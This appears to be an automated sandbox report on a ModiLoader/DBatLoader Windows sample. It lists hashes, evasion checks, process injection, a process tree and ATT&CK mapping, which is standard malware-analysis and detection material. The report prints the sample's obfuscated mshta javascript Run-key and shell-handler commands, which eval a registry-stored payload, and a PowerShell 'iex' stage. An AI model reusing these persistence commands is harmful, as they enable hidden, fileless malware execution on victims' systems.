Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
29-05-2024 22:07
Static task
static1
Behavioral task
behavioral1
Sample
821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe
-
Size
420KB
-
MD5
821aa0af9b1e448cb190cdb1f525f4b5
-
SHA1
19e2bf22c027bd993aa8a2c9ccfce07597c18f8b
-
SHA256
6b959a28b0588409d90e02999113bd442cae3298bad61947d19ccd0787e97736
-
SHA512
338ca5394ed0eae199294a65a908ebb6d42835d2a1ddd9b3ebf44e1085ea9dce1aa956c00dee1244b510fa813317994fd421f159c354f1c0e9b3ae9a8bb9fb39
-
SSDEEP
6144:Na/SLBjqbdiT+3mHFfutZTP0P3gXkHclSTu8yfYsbHmze84C3SU8rp0xH:QSL8bugT0PwEhiGK8B3Op0Z
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2724 3064 mshta.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 61 IoCs
Processes:
resource yara_rule behavioral1/memory/1704-2-0x0000000000400000-0x000000000046C000-memory.dmp modiloader_stage2 behavioral1/memory/1704-4-0x00000000020F0000-0x00000000021C4000-memory.dmp modiloader_stage2 behavioral1/memory/1704-5-0x00000000020F0000-0x00000000021C4000-memory.dmp modiloader_stage2 behavioral1/memory/1704-3-0x00000000020F0000-0x00000000021C4000-memory.dmp modiloader_stage2 behavioral1/memory/1704-6-0x00000000020F0000-0x00000000021C4000-memory.dmp modiloader_stage2 behavioral1/memory/1704-8-0x00000000020F0000-0x00000000021C4000-memory.dmp modiloader_stage2 behavioral1/memory/1704-7-0x00000000020F0000-0x00000000021C4000-memory.dmp modiloader_stage2 behavioral1/memory/1704-9-0x00000000020F0000-0x00000000021C4000-memory.dmp modiloader_stage2 behavioral1/memory/2764-19-0x0000000006170000-0x0000000006244000-memory.dmp modiloader_stage2 behavioral1/memory/756-20-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-21-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/2764-23-0x0000000006170000-0x0000000006244000-memory.dmp modiloader_stage2 behavioral1/memory/756-24-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-38-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-45-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-46-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-44-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-43-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-42-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-41-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-40-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-39-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-37-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-36-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-35-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-34-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-33-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-54-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-57-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-63-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-55-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-53-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-52-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-51-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-32-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-31-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-30-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-29-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-28-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-27-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-26-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/756-25-0x0000000000230000-0x000000000036E000-memory.dmp modiloader_stage2 behavioral1/memory/872-64-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-65-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-77-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-66-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-67-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-68-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-81-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-82-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-80-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-79-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-78-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-76-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-75-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-74-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-73-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-72-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-71-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-70-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 behavioral1/memory/872-69-0x0000000000130000-0x000000000026E000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid process 756 regsvr32.exe -
Drops startup file 1 IoCs
Processes:
regsvr32.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\7358d4\\e5ae70.lnk\"" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:CTuP3WwXE=\"E3dS\";ON51=new%20ActiveXObject(\"WScript.Shell\");yG6AaqF=\"Bqn07tEe7P\";WN1b2i=ON51.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\bfow\\\\niegp\");HB9U4EYuxQ=\"tif5F8k\";eval(WN1b2i);hgKZTY1d=\"z0FUa9FYiS\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:yvPQdz5=\"u6W37k\";G9h=new%20ActiveXObject(\"WScript.Shell\");s9wgXmvL=\"HjCiBk\";GbE56c=G9h.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");WiwqjSWh6=\"zyVWE8rTX\";eval(GbE56c);HbMcl3Ut1v=\"ZLpelf5Ik6\";" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exeregsvr32.exedescription pid process target process PID 2764 set thread context of 756 2764 powershell.exe regsvr32.exe PID 756 set thread context of 872 756 regsvr32.exe regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Modifies registry class 7 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f\ = "2070de" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command\ = "mshta \"javascript:kP4tH1gV=\"pSiBNCdh\";z6X=new ActiveXObject(\"WScript.Shell\");QF8SiQ2O=\"zzcZs\";z0JTv2=z6X.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");nRHIzdf2=\"A5cPTi4\";eval(z0JTv2);CT4ywsegt=\"T\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeregsvr32.exepid process 2764 powershell.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe 756 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exeregsvr32.exepid process 2764 powershell.exe 756 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2764 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
mshta.exepowershell.exeregsvr32.exedescription pid process target process PID 2724 wrote to memory of 2764 2724 mshta.exe powershell.exe PID 2724 wrote to memory of 2764 2724 mshta.exe powershell.exe PID 2724 wrote to memory of 2764 2724 mshta.exe powershell.exe PID 2724 wrote to memory of 2764 2724 mshta.exe powershell.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 2764 wrote to memory of 756 2764 powershell.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe PID 756 wrote to memory of 872 756 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"1⤵PID:1704
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:BAp0P5bD="Y3xX";B4E=new%20ActiveXObject("WScript.Shell");tN9RBav1="0";qbM9m=B4E.RegRead("HKLM\\software\\Wow6432Node\\dzCxnE\\nX53dQDNdz");emmirl1vD="4hoqDuYy8W";eval(qbM9m);Gs3Q3OHT="hdekCOFs";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xnptzdx2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:872
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32KB
MD5cb5eadf560dc3b5aa149c7107893a8f7
SHA1bddd7c974ce2c32ffaa7a1234791edafc16defd4
SHA2561b0147420e2a24cccdc3836648fa3a67fcc5138fffd463a915886a280b4a35d7
SHA512f517d8b296a6af3c2aac9b84a0e30a159de585673a65623a8b6f975ae29b8de8461f4b6df1150665c703f9e75af088a6452de11120f7f617363f8fb9f2f39550
-
Filesize
61B
MD514adc766d85da95cd0990ed6bcc1524d
SHA1e3c8f83a8fbfea658c9139d3e670d609745fb848
SHA2560245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4
SHA512b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8
-
Filesize
877B
MD57298e0387167c3dcd091b6d81b7669a7
SHA14373f5798221909986bc1216c68be0e91e5abeb2
SHA2569b4174d31d8f2b1d55a7f73af3401ce6a5d14026b73065e98d7f3e4484d7463d
SHA5126b3648468794a9a5d0cf7f4d2451a82fde239e59843dc25b0fd8c25a962f6451cb9f1ffd40aff16ed6f941c52dea4e3d511a79878c5a55c5e53f81db8a078cea
-
Filesize
987B
MD5aa54e39149e392ed22125d1706f23fbc
SHA107533595a10fa8e129c01f0be80d17d370c3912a
SHA2568c868e591e57a9616847f102c647e16f06fdb6d107b0a5540a37a6352e9775dd
SHA51228f13c1cb6981313f1dc8de57db38734903939780d02ce14dc14673eaa918e7f458989eed29fbf364008c9f0943ceceae2a0190be406068c5fa5e9289bdb9aaa
-
Filesize
17KB
MD52a880d9ffacfb5a03bdcb409c2c9c78a
SHA1c8bb1f79016573f9618c9452bdc5df405d3659d0
SHA256cff123dab9320d1db27beb544dbbbf9fd24c23eb0df61d5212ddae57c6664b52
SHA512dfee891287091599766fb8901d217c9fae1e5c0028e85718f7df3bb1462ebabd11c964d9ad5de1b898aef87479e4be0add9cbfddc856fabf4a689912c5df1020